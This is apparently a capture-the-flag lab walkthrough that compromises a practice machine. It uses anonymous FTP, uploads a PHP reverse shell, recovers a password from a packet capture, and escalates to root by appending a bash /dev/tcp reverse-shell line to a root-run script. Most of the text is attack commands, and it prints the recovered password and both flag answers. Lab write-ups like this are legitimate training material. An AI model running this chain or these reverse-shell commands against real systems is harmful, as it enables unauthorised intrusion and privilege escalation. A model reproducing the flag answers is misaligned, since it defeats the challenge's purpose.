Abuse traditional vulnerabilities via untraditional means.
first, we scan with nmap
nmap -A -T4 10.10.86.86
we can see 3 open ports are ftp (21), ssh (22) and http (80)
the most notable is ftp
ftp 10.10.86.86
Name (10.10.86.86:admin): anonymous
Password:
you maybe get an error like this
the solution is pass mode on
download all files to local and exit
get .test.log
get ftp
get important.jpg
get notice.txt
nothing here
important.jpg
quick look at website
nothing much here
scan directories with gobuster
gobuster dir -u http://10.10.86.86/ -w /usr/share/wordlists/dirb/common.txt -t 30
go to /files
it's the interface of ftp
prepare a web shell and change to your ip
cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php
let's go back to fpt and upload our shell
cd ftp
put reverse.php
now we can see our shell here
create listener and open file on browser
nc -vlnp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
and the secret spicy soup recipe is love
let's see what in 2 suspicious folders here
hmm, a pcapng file, i will take it back to research
cp /incidents/suspicious.pcapng /var/www/html/files/ftp/
open captured file with wireshark
wireshark -r ./Downloads/suspicious.pcapng
our concern should be http protocol, i see someone has request a web shell in the past
let's take a look at tcp traffic 4444 dump it all out to plain text
after lookup, i can see here is the password for lennie
or you can use strings if you don't familiar with wireshark
strings suspicious.pcapng
su lennie
c4ntg3t3n0ughsp1c3
flag here
| Flag | user.txt |
|---|---|
| Answer | THM{03ce3d619b80ccbfb3b7fc81e46c0e79} |
there is a scripts folder
this file will run with root permission which is one key of privilege
it also run a file with lennie permission
create a reverse shell
echo "bash -i >& /dev/tcp/10.8.0.74/4444 0>&1" >> /etc/print.sh
open netcat and wait it back
nc -vlnp 4444
flag here
| Flag | root.txt |
|---|---|
| Answer | THM{f963aaa6a430f210222158ae15c3d76d} |